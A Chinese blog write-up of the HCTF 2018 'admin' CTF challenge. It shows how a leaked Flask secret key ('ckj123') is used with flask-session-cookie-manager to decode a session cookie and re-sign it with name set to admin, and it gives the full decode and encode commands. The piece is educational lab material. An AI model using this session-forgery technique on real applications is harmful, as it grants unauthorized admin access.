其他分享
首页 > 其他分享> > [HCTF 2018]admin 1

[HCTF 2018]admin 1

作者:互联网

1.发现

1.1将每个界面源代码看一遍,发现提示要注册登录。

1.2注册登录后查看各节目源代码,发现一个提示,后面用到。

 

 

 1.3 在change源代码中,发现提示,下载文件。

 

 

 

1.4 通过第一个提示打开下载文件中的index.html文件,分析代码,发现如果session等于admin就出hctf{},即flag。

而提示flask就有用了,flask是轻量级web框架,session存在客户端,我们可以伪造session(cookie)。

{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>

{% include('footer.html') %}

 

知识点:
1)Flask 会话 Cookie 解码器/编码器的安装与使用。

2.步骤

2.1在config.py中得到secret key

 

 

2.2 在网页中随便提取得到Cookie.

 

 

 2.3 解密

python flask_session_cookie_manager3.py decode -s 'ckj123' -c ".eJw9kMFqwkAURX-lvLWLZBI3ggvLVBth3hB5MczbiDUxccaxNCqSiP_eqQXXh3vg3Dts9l19bmFy6a71CDaHCiZ3ePuCCSiBlmndKmsGpDxCmlsc2KKsDki7FMuVQ-siJnRqsW5ZzhKWq1ZLdOizXlPllPwYcJgNRhQ9S3NDuRsbwV4FD9u8D_vUlEvHZXD_eWQhkIpelUWKkq0p8wQXgfn50VB-05T3WhaJEuujESurbOXYmyk8RrA7d_vN5dvVp1eCpixmYq9pGVKqlm0ThYlncokaVKro3bJsYrXgo_HotczGeJs-dQe_beqXiT7nPzr_J6etDwBikcAIrue6e74GcQSPX8TKa-o.YR7E1g.yceXorVB7JToX1UUNrdBIPfMgJM"

2.4 将name改为admin,再加密,得到新的session值。

python flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'3cce5a26354451c76c47b5785dd694e3d0ead07d4a83d6b297d013703ce2d60479cff36cf42698abdeac53d0565521e846cad74ac6aea409428573eecdc27dff', 'csrf_token': b'925e6f92ce7af8427fe9733810cd850febcf8297', 'image': b'Lqj9', 'name': 'admin', 'user_id': '10'}"

 

 

2.5将加密后的session输回去,然后返回index主页就可以得到flag。

 

3.借鉴

(16条消息) BUUCTF [HCTF 2018]admin 1_wow小华的博客-CSDN博客

https://github.com/noraj/flask-session-cookie-manager

 

标签:name,admin,HCTF,flask,session,cookie,2018,源代码
来源: https://www.cnblogs.com/WHOAMI-xiaoyu/p/15164767.html